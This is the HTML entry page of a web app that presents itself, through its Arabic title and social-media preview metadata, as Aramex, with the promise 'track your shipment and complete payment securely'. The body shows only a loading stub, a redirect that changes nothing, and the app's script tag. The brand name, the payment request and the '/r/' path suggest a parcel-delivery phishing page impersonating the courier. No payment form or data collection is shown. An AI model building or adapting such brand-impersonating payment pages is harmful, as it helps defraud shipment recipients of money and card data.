<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>أرامكس - Aramex | تتبع شحنتك وأكمل الدفع</title>
    <meta name="description" content="شركة أرامكس الرائدة في خدمات الشحن السريع والحلول اللوجستية في المنطقة - تتبع شحنتك وأكمل الدفع بشكل آمن ومحمي" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300;400;700;800&display=swap" rel="stylesheet">

    <!-- Open Graph / Facebook -->
    <meta property="og:type" content="website" />
    <meta property="og:title" content="أرامكس - Aramex | تتبع شحنتك وأكمل الدفع" />
    <meta property="og:description" content="شركة أرامكس الرائدة في خدمات الشحن السريع والحلول اللوجستية في المنطقة - تتبع شحنتك وأكمل الدفع بشكل آمن ومحمي" />
    <meta property="og:image" content="/og-aramex.jpg" />
    <meta property="og:image:width" content="1200" />
    <meta property="og:image:height" content="630" />
    <meta property="og:image:type" content="image/jpeg" />

    <!-- Twitter -->
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="أرامكس - Aramex | تتبع شحنتك وأكمل الدفع" />
    <meta name="twitter:description" content="شركة أرامكس الرائدة في خدمات الشحن السريع والحلول اللوجستية في المنطقة" />
    <meta name="twitter:image" content="/og-aramex.jpg" />
</head>
<body>
    <div id="root" style="text-align: center; padding: 100px 20px; font-family: 'Almarai', sans-serif;">
        <h1>أرامكس - Aramex</h1>
        <p>جاري التحميل...</p>
    </div>
    <script>
        // Redirect to React app
        window.location.href = window.location.origin + window.location.pathname.replace('/r/', '/r/');
    </script>
    <script type="module" src="/src/main.tsx"></script>
</body>
</html>
